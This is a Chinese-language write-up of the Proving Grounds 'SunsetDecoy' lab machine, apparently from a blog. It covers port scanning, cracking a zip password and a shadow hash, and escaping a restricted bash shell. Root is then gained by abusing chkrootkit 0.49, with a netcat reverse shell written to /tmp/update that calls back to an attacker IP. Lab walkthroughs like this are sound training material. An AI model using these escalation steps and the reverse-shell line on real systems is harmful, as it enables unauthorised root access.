PG::SunsetDecoy

nmap -Pn -p- -T4 --min-rate=1000 192.168.133.85
image.png
nmap -Pn -p 22,80 -sCV 192.168.133.85
image.png
查看80端口的页面,是一个压缩包
image.png
下载压缩包后尝试打开,需要密码,所以直接尝试爆破
image.png
得到解压密码 manuel
image.png
在/etc/shadow中找到了可以利用的地方

296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

image.png
得到密码为server
image.png
使用ssh成功登录,但是有些问题,大部分命令无法执行
image.png
查找关键字“-rbash: dircolors: command not found
”得到解决方案
ssh登陆时添加命令 -t “bash --noprofile”
登录后添加环境变量 export PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin
image.png
在查看proof.txt文件时发现一个可执行文件
image.png
运行后选择5,运行AV Scan
image.png
根据提示AV Scan会运行,所以上传pspy查看一下进程
image.png
发现以root权限运行了chkrootkit-0.49的程序
exploit-db中搜索,发现了可以提权的方式
image.png
https://www.exploit-db.com/exploits/33899
根据提示,在/tmp目录下写入shell,当AV执行时就会得到shell
echo ‘/usr/bin/nc 192.168.49.133 4444 -e /bin/sh’ > /tmp/update
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值